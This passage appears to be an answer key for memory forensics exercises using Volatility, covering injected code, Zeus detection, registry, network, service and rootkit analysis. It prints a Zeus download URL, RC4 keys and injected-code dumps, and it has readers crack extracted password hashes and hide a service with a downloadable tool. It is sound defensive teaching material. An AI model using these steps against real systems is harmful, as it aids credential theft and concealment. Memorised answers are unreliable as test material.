00 65 00 20 00 68 00 l.o.c.a.t.e...h. 0x0040aa20 65 00 61 00 70 00 20 00 6d 00 65 00 6d 00 6f 00 e.a.p...m.e.m.o. 0x0040aa30 72 00 79 00 2e 00 00 00 46 00 69 00 6c 00 65 00 r.y.....F.i.l.e. 0x0040aa40 20 00 6d 00 61 00 70 00 70 00 69 00 6e 00 67 00 ..m.a.p.p.i.n.g. 0x0040aa50 20 00 63 00 72 00 65 00 61 00 74 00 65 00 64 00 ..c.r.e.a.t.e.d. 0x0040aa60 20 00 61 00 74 00 3a 00 20 00 25 00 78 00 0a 00 ..a.t.:...%.x... 0x0040aa70 00 00 00 00 46 00 61 00 69 00 6c 00 65 00 64 00 ....F.a.i.l.e.d. 0x0040aa80 20 00 74 00 6f 00 20 00 6d 00 61 00 70 00 20 00 ..t.o...m.a.p... 0x0040aa90 76 00 69 00 65 00 77 00 20 00 6f 00 66 00 20 00 v.i.e.w...o.f... 0x0040aaa0 66 00 69 00 6c 00 65 00 2e 00 00 00 46 00 61 00 f.i.l.e.....F.a. Rule: r1 Owner: Process processmemory.e Pid 928 0x001531c0 68 65 6c 6c 6f 20 66 72 6f 6d 20 74 68 65 20 68 hello.from.the.h 0x001531d0 65 61 70 21 00 00 00 00 00 00 00 00 00 00 00 00 eap!............ 0x001531e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x001531f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153200 c0 01 09 00 00 10 00 00 78 01 15 00 78 01 15 00 ........x...x... 0x00153210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153250 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00153290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x001532a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x001532b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ The first is at 0x0040a9b0 and is inside the process executable: $ python vol.py -f XPSP3-8c391840.vmem dlllist -p 928 Volatility Foundation Volatility Framework 2.4 (Beta) ************************************************************************ processmemory.e pid: 928 Command line : "C:\Documents and Settings\Administrator\Desktop\processmemory.exe" Service Pack 3 Base Size LoadCount Path ---------- ---------- ---------- ---- 0x00400000 0x11000 0xffff C:\Documents and Settings\Administrator\Desktop\processmemory.exe 0x7c900000 0xb2000 0xffff C:\WINDOWS\system32\ntdll.dll 0x7c800000 0xf6000 0xffff C:\WINDOWS\system32\kernel32.dll The second at 0x001531c0 is the one on the heap. 4. The application's output tells you "File mapping created at..." Use vadinfo and determine the name of the file it maps into that address. The correct answer is: processmemory.exe (itself) In our example, the address was 0x360000. So you can do this: $ python vol.py -f XPSP3-8c391840.vmem vadinfo -n processmemory --addr 0x360000 Volatility Foundation Volatility Framework 2.4 (Beta) ************************************************************************ Pid: 928 VAD node @ 0x822dadb8 Start 0x00360000 End 0x0036cfff Tag Vad Flags: Protection: 1 Protection: PAGE_READONLY ControlArea @820aa248 Segment e1156fc8 NumberOfSectionReferences: 1 NumberOfPfnReferences: 13 NumberOfMappedViews: 1 NumberOfUserReferences: 2 Control Flags: Accessed: 1, File: 1, HadUserReference: 1, WasPurged: 1 FileObject @821488a8, Name: \Documents and Settings\Administrator\Desktop\processmemory.exe First prototype PTE: e20bf800 Last contiguous PTE: e20bf860 Flags2: CopyOnWrite: 1, Inherit: 1 5. What VAD tag is used to map the file you identified on Step 4? The correct answer is: Vad 6. How can you distinguish the mapping you identified in Question 4 from the mapping of the process' executable? The correct answer is: The one identified in Question 4 is PAGE_READONLY. The process' executable according to dlllist is at 0x00400000. This one is PAGE_EXECUTE_WRITECOPY: Pid: 928 VAD node @ 0x823fcd38 Start 0x00400000 End 0x00410fff Tag Vad Flags: CommitCharge: 4, ImageMap: 1, Protection: 7 Protection: PAGE_EXECUTE_WRITECOPY ControlArea @8208b908 Segment e2241428 NumberOfSectionReferences: 1 NumberOfPfnReferences: 14 NumberOfMappedViews: 1 NumberOfUserReferences: 2 Control Flags: File: 1, HadUserReference: 1, Image: 1 FileObject @822de140, Name: \Documents and Settings\Administrator\Desktop\processmemory.exe First prototype PTE: e2241468 Last contiguous PTE: fffffffc Flags2: Inherit: 1 7. Run the zeusscan2 plugin against sample006.bin. A) How many unique variants of Zeus are running? B) Dump the associated VAD segment from one of the infected processes. Upload it to VirusTotal. Do you get any hits? The correct answer is: 4 unique variants (you can tell because there are 4 unique RC4 keys). Here is an example of one variant: $ python vol.py --plugins=contrib/plugins/malware -f sample006.bin zeusscan2 Volatility Foundation Volatility Framework 2.4 (Beta) ************************************************** Process : explorer.exe Pid : 1752 Address : 50855936 URL 0 : http://193.43.134.14/eu2.bin Identifier : JASONRESACC69_7875768F16073AAF Mutant key : 393228402 XOR key : 537311486 Registry : HKEY_CURRENT_USER\SOFTWARE\Microsoft\Izozo Value 1 : Kealtuuxd Value 2 : Yrdii Value 3 : Kebooqu Executable : Obyt\ihah.exe Data file : Ebupzu\uzugl.zuw Config RC4 key : 0x03080000 4a ba 2c 63 eb 7c fc 45 c4 f3 b6 2d 31 29 21 2e J.,c.|.E...-1)!. 0x03080010 53 0f 3f ef 9a 2a f8 82 96 6b e1 a2 3b 5f 34 fd S.?..*...k..;_4. 0x03080020 a6 02 cc 39 0b 16 40 33 1f a1 dc af 93 9b 5b 94 ...9..@3......[. 0x03080030 68 62 84 46 ca 64 8d 43 13 d4 d9 72 00 5c 2b bc hb.F.d.C...r.\+. 0x03080040 f6 d7 88 91 24 9f bd 1e 7a 07 c5 6e 1a 4e 90 92 ....$...z..n.N.. 0x03080050 c1 42 0c 75 47 3a 9e 1d c2 ec 0d ed b8 71 b4 ab .B.uG:.......q.. 0x03080060 e6 5d e3 14 48 b9 e9 e8 b2 10 ee f4 e2 2f a4 09 .]..H......../.. 0x03080070 54 b7 95 be 50 99 8b 87 8f 37 9d fa f2 d5 b1 18 T...P....7...... 0x03080080 01 db 3c cf aa 70 e5 15 9c 5a 26 27 de da d8 d6 ..<..p...Z&'.... 0x03080090 59 a8 1b 30 cd 6c 78 c0 e7 c6 81 22 86 17 38 a7 Y..0.lx...."..8. 0x030800a0 df 41 ad 4d 44 11 76 a3 52 a9 b3 6d 51 05 c9 b5 .A.MD.v.R..mQ... 0x030800b0 85 49 77 c7 23 f7 3e 8a 03 69 ac 3d 4c 89 ff 58 .Iw.#.>..i.=L..X 0x030800c0 dd 57 5e 97 98 f1 65 c3 7d f0 e0 20 e4 25 7e 7b .W^...e.}....%~{ 0x030800d0 b0 06 4b a5 c8 80 f9 f5 55 1c 7f 83 73 d1 66 fe ..K.....U...s.f. 0x030800e0 8c 28 19 4f 60 36 0a 8e ce ae fb 0e 74 35 79 56 .(.O`6......t5yV 0x030800f0 a0 08 ea bb 67 d3 d0 6a 12 6f 32 bf d2 04 cb 61 ....g..j.o2....a 0x03080100 00 00 .. Credential RC4 key : 0x03080000 6f e4 94 f2 f1 5e 5c c1 8c e8 66 c5 13 2a 23 39 o....^\...f..*#9 0x03080010 84 36 6a 83 b2 55 6c 11 5a f3 b6 20 07 6d ba de .6j..Ul.Z....m.. 0x03080020 52 8e 34 bf 8a 05 0f 64 35 29 cb 5f ff 00 87 fc R.4....d5)._.... 0x03080030 b5 5b 67 b8 eb 1a 0e 1f 32 ae 54 3a 88 ed c3 51 .[g.....2.T:...Q 0x03080040 40 14 3e 53 dc 7c a7 0b 79 26 e5 45 99 7d 1c d0 @.>S.|..y&.E.}.. 0x03080050 90 8f 80 95 71 58 41 5d f9 af 9e a1 6e ef 25 4e ....qXA]....n.%N 0x03080060 48 2d b1 bd 33 ab d3 b7 4d 10 7e 44 65 7b cd 2f H-..3...M.~De{./ 0x03080070 ea 3f 2c ce 9a 9d db 31 b0 69 cf f7 e7 a6 82 a4 .?,....1.i...... 0x03080080 ad a3 30 9b 76 f0 f5 ac c2 fb 8b 4f fe 8d a8 04 ..0.v......O.... 0x03080090 86 a0 50 4c 4b e2 ec 60 e6 dd c6 42 cc 6b 89 57 ..PLK..`...B.k.W 0x030800a0 d1 d8 78 4a 1d d7 9f e0 7a 75 e3 7f a2 77 85 2b ..xJ....zu...w.+ 0x030800b0 59 16 d6 d4 f4 93 ee 9c d2 03 be 2e 06 1b 56 70 Y.............Vp 0x030800c0 d5 73 ca f8 fd 12 37 49 98 46 0d bb 96 c9 18 b9 .s....7I.F...... 0x030800d0 81 74 a9 3c 21 c4 da 38 0c 1e 27 0a c7 15 47 68 .t. Introduction and overview of IPython's features. %quickref -> Quick reference. help -> Python's own help system. object? -> Details about 'object', use 'object??' for extra details. In [1]: for process in getprocs(): if str(process.ImageFileName) == "cmd.exe": if process.Peb.ProcessParameters: print process.UniqueProcessId, process.Peb.ProcessParameters.StandardInput, process.Peb.ProcessParameters.StandardOutput, process.Peb.ProcessParameters.StandardError ...: 2484 3 7 11 292 3 7 11 832 128 128 128 <==== this one has non standard handles Now you know process ID 832 is the instance of cmd.exe that's redirecting the remote commands. 3. Analyze sample007.bin. A) Are any processes hosting injected code? If so, which one(s)? B) Have any processes been hollowed? If so, which one(s)? C) Extract the injected code segments or hollowed process executables to disk for further static analysis. The correct answer is: services.exe (pid 668), svchost.exe (pid 940), lsass.exe (pid 868), lsass.exe (pid 1928) are hosting injected code. Here is some example output: $ python vol.py -f sample007.bin volshell Volatility Foundation Volatility Framework 2.4 (Beta) Process: services.exe Pid: 668 Address: 0x940000 Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE Flags: Protection: 6 0x00940000 90 06 94 00 c6 07 94 00 24 00 94 00 a5 04 00 00 ........$....... 0x00940010 f2 04 94 00 48 06 00 00 c9 04 94 00 29 00 00 00 ....H.......)... 0x00940020 00 00 c5 00 e8 13 00 00 00 5a 77 4d 61 70 56 69 .........ZwMapVi 0x00940030 65 77 4f 66 53 65 63 74 69 6f 6e 00 5a 51 81 c1 ewOfSection.ZQ.. 0x940000 90 NOP 0x940001 06 PUSH ES 0x940002 94 XCHG ESP, EAX 0x940003 00c6 ADD DH, AL 0x940005 07 POP ES Process: services.exe Pid: 668 Address: 0x13f0000 Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE Flags: Protection: 6 0x013f0000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. 0x013f0010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0x013f0020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x013f0030 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 ................ 0x13f0000 4d DEC EBP 0x13f0001 5a POP EDX 0x13f0002 90 NOP 0x13f0003 0003 ADD [EBX], AL 0x13f0005 0000 ADD [EAX], AL 0x13f0007 000400 ADD [EAX+EAX], AL Process: svchost.exe Pid: 940 Address: 0xb70000 Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE Flags: Protection: 6 0x00b70000 29 87 7f ae 00 00 00 00 ff ff ff ff 77 35 00 01 )...........w5.. 0x00b70010 4b 00 45 00 52 00 4e 00 45 00 4c 00 33 00 32 00 K.E.R.N.E.L.3.2. 0x00b70020 2e 00 44 00 4c 00 4c 00 2e 00 41 00 53 00 4c 00 ..D.L.L...A.S.L. 0x00b70030 52 00 2e 00 30 00 33 00 36 00 30 00 63 00 38 00 R...0.3.6.0.c.8. 0xb70000 29877fae0000 SUB [EDI+0xae7f], EAX 0xb70006 0000 ADD [EAX], AL 0xb70008 ff DB 0xff 0xb70009 ff DB 0xff 0xb7000a ff DB 0xff 0xb7000b ff7735 PUSH DWORD [EDI+0x35] 0xb7000e 0001 ADD [ECX], AL Process: lsass.exe Pid: 1928 Address: 0x680000 Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE Flags: Protection: 6 0x00680000 90 06 68 00 c6 07 68 00 24 00 68 00 a5 04 00 00 ..h...h.$.h..... 0x00680010 f2 04 68 00 48 06 00 00 c9 04 68 00 29 00 00 00 ..h.H.....h.)... 0x00680020 00 00 6f 00 e8 13 00 00 00 5a 77 4d 61 70 56 69 ..o......ZwMapVi 0x00680030 65 77 4f 66 53 65 63 74 69 6f 6e 00 5a 51 81 c1 ewOfSection.ZQ.. 0x680000 90 NOP 0x680001 06 PUSH ES 0x680002 6800c60768 PUSH DWORD 0x6807c600 0x680007 002400 ADD [EAX+EAX], AH 0x68000a 6800a50400 PUSH DWORD 0x4a500 Process: lsass.exe Pid: 1928 Address: 0x870000 Vad Tag: Vad Protection: PAGE_EXECUTE_READWRITE Flags: Protection: 6 0x00870000 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 MZ.............. 0x00870010 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 ........@....... 0x00870020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0x00870030 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 ................ 0x870000 4d DEC EBP 0x870001 5a POP EDX 0x870002 90 NOP 0x870003 0003 ADD [EBX], AL 0x870005 0000 ADD [EAX], AL 0x870007 000400 ADD [EAX+EAX], AL Also, the two lsass.exe processes are hollowed. According to the legit copy (pid 680) its image base should be 0x01000000. However, for pid 868 and 1928, the 0x01000000 memory range in ldrmodules is True/False/True with no mapped filename. $ python vol.py -f sample007.bin ldrmodules -p 680,868,1928 Volatility Foundation Volatility Framework 2.4 (Beta) Pid Process Base InLoad InInit InMem MappedPath -------- -------------------- ---------- ------ ------ ----- ---------- 680 lsass.exe 0x01000000 True False True \WINDOWS\system32\lsass.exe 868 lsass.exe 0x00080000 False False False 868 lsass.exe 0x7c900000 True True True \WINDOWS\system32\ntdll.dll 868 lsass.exe 0x77e70000 True True True \WINDOWS\system32\rpcrt4.dll 868 lsass.exe 0x7c800000 True True True \WINDOWS\system32\kernel32.dll 868 lsass.exe 0x77fe0000 True True True \WINDOWS\system32\secur32.dll 868 lsass.exe 0x7e410000 True True True \WINDOWS\system32\user32.dll 868 lsass.exe 0x01000000 True False True 868 lsass.exe 0x77f10000 True True True \WINDOWS\system32\gdi32.dll 868 lsass.exe 0x77dd0000 True True True \WINDOWS\system32\advapi32.dll 1928 lsass.exe 0x00080000 False False False 1928 lsass.exe 0x7c900000 True True True \WINDOWS\system32\ntdll.dll 1928 lsass.exe 0x773d0000 True True True \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.5512_x-ww_35d4ce83\comctl32.dll 1928 lsass.exe 0x77f60000 True True True \WINDOWS\system32\shlwapi.dll 1928 lsass.exe 0x771b0000 True True True \WINDOWS\system32\wininet.dll 1928 lsass.exe 0x77a80000 True True True \WINDOWS\system32\crypt32.dll 1928 lsass.exe 0x77fe0000 True True True \WINDOWS\system32\secur32.dll 1928 lsass.exe 0x77c00000 True True True \WINDOWS\system32\version.dll 1928 lsass.exe 0x01000000 True False True 1928 lsass.exe 0x5b860000 True True True \WINDOWS\system32\netapi32.dll 1928 lsass.exe 0x77e70000 True True True \WINDOWS\system32\rpcrt4.dll 1928 lsass.exe 0x71ab0000 True True True \WINDOWS\system32\ws2_32.dll 1928 lsass.exe 0x71ad0000 True True True \WINDOWS\system32\wsock32.dll 1928 lsass.exe 0x774e0000 True True True \WINDOWS\system32\ole32.dll 1928 lsass.exe 0x7e410000 True True True \WINDOWS\system32\user32.dll 1928 lsass.exe 0x77f10000 True True True \WINDOWS\system32\gdi32.dll 1928 lsass.exe 0x77120000 True True True \WINDOWS\system32\oleaut32.dll 1928 lsass.exe 0x76d60000 True True True \WINDOWS\system32\iphlpapi.dll 1928 lsass.exe 0x769c0000 True True True \WINDOWS\system32\userenv.dll 1928 lsass.exe 0x7c800000 True True True \WINDOWS\system32\kernel32.dll 1928 lsass.exe 0x76bf0000 True True True \WINDOWS\system32\psapi.dll 1928 lsass.exe 0x77c10000 True True True \WINDOWS\system32\msvcrt.dll 1928 lsass.exe 0x77dd0000 True True True \WINDOWS\system32\advapi32.dll 1928 lsass.exe 0x7c9c0000 True True True \WINDOWS\system32\shell32.dll 1928 lsass.exe 0x00870000 True True True 1928 lsass.exe 0x76f20000 True True True \WINDOWS\system32\dnsapi.dll 1928 lsass.exe 0x5d090000 True True True \WINDOWS\system32\comctl32.dll 1928 lsass.exe 0x71aa0000 True True True \WINDOWS\system32\ws2help.dll 1928 lsass.exe 0x77b20000 True True True \WINDOWS\system32\msasn1.dll You can dump the memory range like this: $ python vol.py sample007.bin procdump --memory -D . -p 868,1928 Volatility Foundation Volatility Framework 2.4 (Beta) Process(V) ImageBase Name Result ---------- ---------- -------------------- ------ 0x81c498c8 0x01000000 lsass.exe OK: executable.868.exe 0x81c47c00 0x01000000 lsass.exe OK: executable.1928.exe 4. Extract storytime.dll.zip (password: infected). A) Can you analyze the file in IDA pro, PE analyzers, etc? B) Run the DLL on a 64-bit system and dump memory while it's running. C) Determine the load address of the DLL and unpack it from memory. The correct answer is: No, you cannot initially analyze it statically in IDA Pro. Run it in the VM with "rundll32 ,ExportName" and then use dlldump to extract the unpacked copy. 5. Perform the following steps: A) Create an account on virusshare.com B) Download some malware samples (packed or unpacked) C) Run them in your virtual machine and develop Yara signatures for detecting their presence D) Create memory dumps and scan for your signatures with the yarascan plugin The correct answer is: N/A ---------------------------------------------------------------------- Chapter 9: Event Logs ---------------------------------------------------------------------- 1. What process on XP and 2003 stores mapped copies of the event log files? A) evtsvc.exe B) System C) services.exe D) mmc.exe The correct answer is: C 2. Which of the following statement(s) are False? A) Event logs can be cleared B) Reconstructing event logs from memory may yield incomplete results, because not all records are mapped into memory (or they're paged) C) If the Security event log is empty, you should check the logging policy in the registry D) Volatility natively parses Vista and later event log formats The correct answer is: D 3. Use the evtlogs plugin against an XP or 2003 memory image. A) Analyze the output text files for particular event IDs B) Export the raw logs and process them with a tool external to Volatility The correct answer is: N/A 4. Analyze a Vista or later memory image. A) Extract the event logs with the "dumpfiles" plugin B) Analyze the event logs with a tool external to Volatility The correct answer is: N/A ---------------------------------------------------------------------- Chapter 10: Registry in Memory ---------------------------------------------------------------------- 1. Run the hivelist plugin on sample004.bin. A) What's the virtual address of the HKEY_LOCAL_MACHINE\SOFTWARE hive? B) What's the virtual address of the "administrator" user's HKEY_CURRENT_USER hive? The correct answer is: A) 0xe14596b8 and B) 0xe10b9008 $ python vol.py -f sample004.bin hivelist Volatility Foundation Volatility Framework 2.4 (Beta) Virtual Physical Name ---------- ---------- ---- 0xe1b67350 0x13f3c350 \Device\HarddiskVolume1\Documents and Settings\administrator\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe10b9008 0x0cf25008 \Device\HarddiskVolume1\Documents and Settings\administrator\NTUSER.DAT 0xe175b9e8 0x082589e8 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe1740b60 0x08241b60 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT 0xe1682b60 0x07a02b60 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat 0xe16d9008 0x07e72008 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT 0xe14596b8 0x069876b8 \Device\HarddiskVolume1\WINDOWS\system32\config\software 0xe1460008 0x06931008 \Device\HarddiskVolume1\WINDOWS\system32\config\default 0xe1460b60 0x06931b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM 0xe1459b60 0x06987b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY 0xe1343b60 0x02a49b60 [no name] 0xe1035b60 0x02739b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system 0xe102e008 0x02733008 [no name] 2. Use the printkey plugin to check the "Microsoft\Windows\CurrentVersion\Run" key in both identified hives above. Do you see any entries that are worth further investigation? The correct answer is: the svchosts.exe entry in HKLM (the real filename is svchost.exe) $ python vol.py -f sample004.bin printkey -o 0xe14596b8 -K "Microsoft\Windows\CurrentVersion\Run" Volatility Foundation Volatility Framework 2.4 (Beta) Legend: (S) = Stable (V) = Volatile ---------------------------- Registry: User Specified Key name: Run (S) Last updated: 2012-04-28 01:59:22 UTC+0000 Subkeys: (S) OptionalComponents Values: REG_SZ Adobe Reader Speed Launcher : (S) "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe" REG_SZ Adobe ARM : (S) "C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" REG_SZ svchosts : (S) C:\WINDOWS\system32\svchosts.exe 3. Analyze sample007.bin. Determine which services were most recently added or modified. The correct answer is: (see the example in Chapter 12 - page 354) 4. Extract the cached password hashes (using hashdump) on some of your memory samples. Load them into a password cracker to determine the plain text password (if possible). The correct answer is: N/A 5. Execute the following steps: A) On your system, launch some programs, browse to some directories in Explorer, etc B) Create a memory dump of your system C) Run the shimcache, userassist, and shellbags plugins. Do you see any artifacts of the actions you performed in A? D) Run the plugins on some memory images from prior investigations The correct answer is: N/A ---------------------------------------------------------------------- Chapter 11: Networking ---------------------------------------------------------------------- 1. What is one potential way to hide winsock network activity from memory forensics tools? A) Hook the DeviceIoControl API in user mode B) Hook the IRP_MJ_DEVICE_CONTROL of tcpip.sys in kernel mode C) Unlink the singly linked list of connection or socket structures in kernel mode D) Use an NDIS driver The correct answer is: D 2. TCP client and server applications both create _ADDRESS_OBJECT (sockets). True or False? The correct answer is: True 3. Was RDP enabled on sample004.bin? The correct answer is: Yes, you can see the open port with sockets: $ python vol.py -f sample004.bin sockets | grep 3389 Volatility Foundation Volatility Framework 2.4 (Beta) 0x821fde98 852 3389 6 TCP 0.0.0.0 2012-04-28 01:57:04 UTC+0000 4. How many active connections did sample004.bin have? What websites (port 80 or 443) did it access in the recent past? The correct answer is: 2 active connections (TCP 139 and 443). $ python vol.py -f sample004.bin connections Volatility Foundation Volatility Framework 2.4 (Beta) Offset(V) Local Address Remote Address Pid ---------- ------------------------- ------------------------- --- 0x8201ce68 172.16.150.20:1365 172.16.150.10:139 4 0x82018e00 172.16.150.20:1424 221.54.197.32:443 1096 It communicated with several web servers recently: $ python vol.py -f sample004.bin connscan | egrep '(:80|:443)' Volatility Foundation Volatility Framework 2.4 (Beta) 0x02018e00 172.16.150.20:1424 221.54.197.32:443 1096 0x02168718 172.16.150.20:1428 199.7.59.190:80 1796 0x0222aa40 172.16.150.20:1427 199.7.52.190:80 1796 0x0c3bfa40 172.16.150.20:1427 199.7.52.190:80 1796 0x1cd75a40 172.16.150.20:1427 199.7.52.190:80 1796 0x1df7aa40 172.16.150.20:1427 199.7.52.190:80 1796 0x1f3a1a40 172.16.150.20:1427 199.7.52.190:80 1796 5. Run Bulk Extractor or CapLoader against a memory image. Can you trace back the network activity to process(es) or driver(s) that generated it? The correct answer is: N/A 6. Perform the following steps: A) Use Internet Explorer v4 - v9 on one of your virtual machines to access web pages B) Visit an FTP site with Windows Explorer C) Acquire memory from your system D) Use the iehistory plugin against the IE and Explorer process to gather artifacts. Does it contain what you expect? The correct answer is: N/A 7. Use the filescan and dumpfiles plugins to extract and analyze the HOSTS file from some of your memory dumps. Here is an example: $ python vol.py -f sample007.bin filescan | grep hosts Volatility Foundation Volatility Framework 2.4 (Beta) 0x0000000002192f90 1 0 R--rw- \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts $ python vol.py -f sample007.bin dumpfiles -Q 0x0000000002192f90 -D . --name Volatility Foundation Volatility Framework 2.4 (Beta) DataSectionObject 0x02192f90 None \Device\HarddiskVolume1\WINDOWS\system32\drivers\etc\hosts $ strings file.None.0x8211f1f8.hosts.dat # Copyright (c) 1993-1999 Microsoft Corp. # This is a sample HOSTS file used by Microsoft TCP/IP for Windows. # This file contains the mappings of IP addresses to host names. Each # entry should be kept on an individual line. The IP address should # be placed in the first column followed by the corresponding host name. # The IP address and the host name should be separated by at least one # space. # Additionally, comments (such as these) may be inserted on individual # lines or following the machine name denoted by a '#' symbol. # For example: # 102.54.94.97 rhino.acme.com # source server # 38.25.63.10 x.acme.com # x client host 127.0.0.1 localhost ---------------------------------------------------------------------- Chapter 12: Services ---------------------------------------------------------------------- 1. Which of the following is NOT a reason why malware uses services: A) For persistence B) To load kernel drivers C) To get code running inside services.exe D) To hide among the various svchost.exe processes that you typically see The correct answer is: C 2. Malware that leverages services must directly or indirectly call CreateService and StartService eventually. True or False? The correct answer is: False (it can call native APIs such as NdrClientCall and bypass the higher-level APIs) 3. Perform the following steps: A) Run servicedll_whitelist.py on one of your systems (make sure to install Pywin32 first) B) Dump memory from the system C) Run svcscan with the --verbose flag to see the ServiceDll values D) Can you spot any discrepancies? The correct answer is: N/A 4. Perform the following steps: A) Create a memory dump of your Windows XP or 2003 system B) Download the UnlinkServiceRecord.zip tool from https://code.google.com/p/malwarecookbook/source/browse/trunk/17/10/UnlinkServiceRecord.zip C) Choose a service that's running and unlink it with the tool D) Type "sc query NAME" on command line (where NAME is the name of the service you unlinked). Can the system find any information on that service? E) Dump memory a second time F) Use the svcscan plugin to detect the unlinked service The correct answer is: N/A (see the "Revealing Hidden Services" section of Chapter 12) 5. Analyze sample001.bin. A) What new service did the malware install? How do you know it's new? B) What is the path to the malicious DLL that implements the service? C) Google the name of the service. Is it related to any known exploits or threat groups? D) Is the service running? If so, what is the host process ID? E) Dump the malicious DLL from memory for static analysis The correct answer is: The malware created 6to4. You can tell it's new because alphabetically 6to4 should be near the top of the list, but svcscan shows its order is at the very end (after xmlprov). Thus, 6to4 was added after the last reboot. $ python vol.py -f sample001.bin svcscan [snip] Offset: 0x389cd0 Order: 227 Start: SERVICE_DEMAND_START Process ID: - Service Name: xmlprov Display Name: Network Provisioning Service Service Type: SERVICE_WIN32_SHARE_PROCESS Service State: SERVICE_STOPPED Binary Path: - Offset: 0x389d60 Order: 228 Start: SERVICE_AUTO_START Process ID: 1024 Service Name: 6to4 Display Name: Microsoft Device Manager Service Type: SERVICE_WIN32_SHARE_PROCESS Service State: SERVICE_RUNNING Binary Path: C:\WINDOWS\System32\svchost.exe -k netsvcs Using the --verbose flag to svcscan will show the ServiceDll path of C:\WINDOWS\system32\6to4ex.dll The 6to4 service is not associated with any particular threat group per se, although many have abused it in the past. The 6to4 service is a legitimate component of the OS (helps migrate IPv4 to IPv6), but it's just often hijacked. The service is currently running with PID 1024. You can dump the DLL with dlldump. ---------------------------------------------------------------------- Chapter 13: Kernel Forensics and Rootkits ---------------------------------------------------------------------- 1. If a kernel module unlinks from the PsLoadedModuleList, manipulates the MmLd pool tags, and zeroes out its PE header, you can still find the malicious rootkit code how? A) By following thread start addresses B) By following kernel callbacks C) By following timer DPCs D) By analyzing corresponding driver objects E) All of the above The correct answer is: E 2. You may not find entries in the "services" key of the registry for drivers loaded via NtLoadDriver. True or False? The correct answer is: True (because malware can delete the registry keys after loading the driver) 3. Perform the following steps: A) Run Process Explorer from Sysinternals on a 64-bit Windows system B) Dump memory of the system C) Run the modules plugin. Does Process Explorer show up at the start or end of the list? Why? D) Run the callbacks plugin. What types of callbacks does Process Explorer use? The correct answer is: Yes, Process Explorer kernel module will show up near the end of the list, since the modules added sequentially. Process Explorer uses process creation, thread creation, and image load callbacks. 4. Perform the following steps on sample008.bin: A) Determine if the system is infected B) Identify and extract the rootkit code (if any) from kernel memory C) What is/was the name of the driver file on disk? D) For extra credit, find the base address of the rootkit driver in memory, extract it, and repair the PE header so you can load it in IDA Pro for reverse engineering. Here are some of the ways you can detect this rootkit. First, there are various orphan threads: $ python vol.py -f sample008.bin threads -F OrphanThread Volatility Foundation Volatility Framework 2.4 (Beta) [x86] Gathering all referenced SSDTs from KTHREADs... Finding appropriate address space for tables... ------ ETHREAD: 0xff1f92b0 Pid: 4 Tid: 1648 Tags: OrphanThread,SystemThread Created: 2010-08-15 19:26:13 UTC+0000 Exited: 1970-01-01 00:00:00 UTC+0000 Owning Process: System Attached Process: System State: Waiting:DelayExecution BasePriority: 0x8 Priority: 0x8 TEB: 0x00000000 StartAddress: 0xf2edd150 UNKNOWN ServiceTable: 0x80552180 [0] 0x80501030 [1] 0x00000000 [2] 0x00000000 [3] 0x00000000 Win32Thread: 0x00000000 CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM 0xf2edd150 803d782aeff200 CMP BYTE [0xf2ef2a78], 0x0 0xf2edd157 7437 JZ 0xf2edd190 0xf2edd159 56 PUSH ESI 0xf2edd15a bef0d0edf2 MOV ESI, 0xf2edd0f0 0xf2edd15f ff35702aeff2 PUSH DWORD [0xf2ef2a70] 0xf2edd165 ff DB 0xff 0xf2edd166 15 DB 0x15 0xf2edd167 0c DB 0xc ------ ETHREAD: 0x0113e4a8 Pid: 4 Tid: 600 Tags: OrphanThread,ScannerOnly,SystemThread Created: 2010-08-11 06:09:35 UTC+0000 Exited: 2010-08-11 06:09:35 UTC+0000 Owning Process: System Attached Process: System State: Terminated BasePriority: 0x8 Priority: 0x18 TEB: 0x00000000 StartAddress: 0xf2fe2150 UNKNOWN ServiceTable: 0x80552180 [0] 0x80501030 [1] 0x00000000 [2] 0x00000000 [3] 0x00000000 Win32Thread: 0x00000000 CrossThreadFlags: PS_CROSS_THREAD_FLAGS_SYSTEM, PS_CROSS_THREAD_FLAGS_TERMINATED 